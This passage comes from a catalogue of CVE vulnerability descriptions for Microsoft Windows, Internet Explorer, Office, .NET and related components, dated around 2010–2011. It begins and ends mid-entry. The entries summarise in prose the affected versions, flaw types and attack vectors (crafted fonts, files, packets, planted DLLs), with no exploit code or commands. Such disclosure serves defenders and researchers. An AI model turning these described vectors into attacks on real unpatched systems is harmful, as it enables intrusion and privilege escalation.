10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3222] Stack-based buffer overflow in the Remote Procedure Call Subsystem (RPCSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted LPC message that requests an LRPC connection from an LPC server to a client, aka "LPC Message Buffer Overrun Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3139] Untrusted search path vulnerability in Microsoft Windows Progman Group Converter (grpconv.exe) allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse imm.dll that is located in the same folder as a .grp file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2742] The Netlogon RPC Service in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, and R2, when the domain controller role is enabled, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted RPC packet, aka "Netlogon RPC Null dereference DOS Vulnerability." [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2729] The Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when printer sharing is enabled, does not properly validate spooler access permissions, which allows remote attackers to create files in a system directory, and consequently execute arbitrary code, by sending a crafted print request over RPC, as exploited in the wild in September 2010, aka "Print Spooler Service Impersonation Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2567] The RPC client implementation in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly allocate memory during the parsing of responses, which allows remote RPC servers and man-in-the-middle attackers to execute arbitrary code via a malformed response, aka "RPC Memory Corruption Vulnerability." [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text Converters in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse malformed structures in Word 97 documents, which allows remote attackers to execute arbitrary code via a crafted document containing an unspecified value that is used in a loop counter, aka "WordPad Word 97 Text Converter Memory Corruption Vulnerability." [CVE-2010-2555] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the length of strings in the registry, which allows local users to gain privileges or cause a denial of service (memory corruption) via vectors involving a long string, aka "Tracing Memory Corruption Vulnerability." [CVE-2010-2554] The Tracing Feature for Services in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 has incorrect ACLs on its registry keys, which allows local users to gain privileges via vectors involving a named pipe and impersonation, aka "Tracing Registry Key ACL Vulnerability." [CVE-2010-2553] The Cinepak codec in Microsoft Windows XP SP2 and SP3, Windows Vista SP1 and SP2, and Windows 7 does not properly decompress media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "Cinepak Codec Decompression Vulnerability." [CVE-2010-2552] Stack consumption vulnerability in the SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to cause a denial of service (system hang) via a malformed SMBv2 compounded request, aka "SMB Stack Exhaustion Vulnerability." [CVE-2010-2551] The SMB Server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate an internal variable in an SMB packet, which allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 packet, aka "SMB Variable Validation Vulnerability." [CVE-2010-2550] The SMB Server in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate fields in an SMB request, which allows remote attackers to execute arbitrary code via a crafted SMB packet, aka "SMB Pool Overflow Vulnerability." [CVE-2010-2549] Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability." [CVE-2010-2265] Cross-site scripting (XSS) vulnerability in the GetServerName function in sysinfo/commonFunc.js in Microsoft Windows Help and Support Center for Windows XP and Windows Server 2003 allows remote attackers to inject arbitrary web script or HTML via the svr parameter to sysinfo/sysinfomain.htm. NOTE: this can be leveraged with CVE-2010-1885 to execute arbitrary commands without user interaction. [CVE-2010-2091] Microsoft Outlook Web Access (OWA) 8.2.254.0, when Internet Explorer 7 on Windows Server 2003 is used, does not properly handle the id parameter in a Folder IPF.Note action to the default URI, which might allow remote attackers to obtain sensitive information or conduct cross-site scripting (XSS) attacks via an invalid value. [CVE-2010-1898] The Common Language Runtime (CLR) in Microsoft .NET Framework 2.0 SP1, 2.0 SP2, 3.5, 3.5 SP1, and 3.5.1, and Microsoft Silverlight 2 and 3 before 3.0.50611.0 on Windows and before 3.0.41130.0 on Mac OS X, does not properly handle interfaces and delegations to virtual methods, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (aka XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "Microsoft Silverlight and Microsoft .NET Framework CLR Virtual Method Delegate Vulnerability." [CVE-2010-1897] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate pseudo-handle values in callback parameters during window creation, which allows local users to gain privileges via a crafted application, aka "Win32k Window Creation Vulnerability." [CVE-2010-1896] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 do not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k User Input Validation Vulnerability." [CVE-2010-1895] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly perform memory allocation before copying user-mode data to kernel mode, which allows local users to gain privileges via a crafted application, aka "Win32k Pool Overflow Vulnerability." [CVE-2010-1894] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, do not properly handle unspecified exceptions, which allows local users to gain privileges via a crafted application, aka "Win32k Exception Handling Vulnerability." [CVE-2010-1893] Integer overflow in the TCP/IP stack in Microsoft Windows Vista SP1, Windows Server 2008 Gold and R2, and Windows 7 allows local users to gain privileges via a buffer of user-mode data that is copied to kernel mode, aka "Integer Overflow in Windows Networking Vulnerability." [CVE-2010-1892] The TCP/IP stack in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle malformed IPv6 packets, which allows remote attackers to cause a denial of service (system hang) via multiple crafted packets, aka "IPv6 Memory Corruption Vulnerability." [CVE-2010-1891] The Client/Server Runtime Subsystem (aka CSRSS) in the Win32 subsystem in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2, when a Chinese, Japanese, or 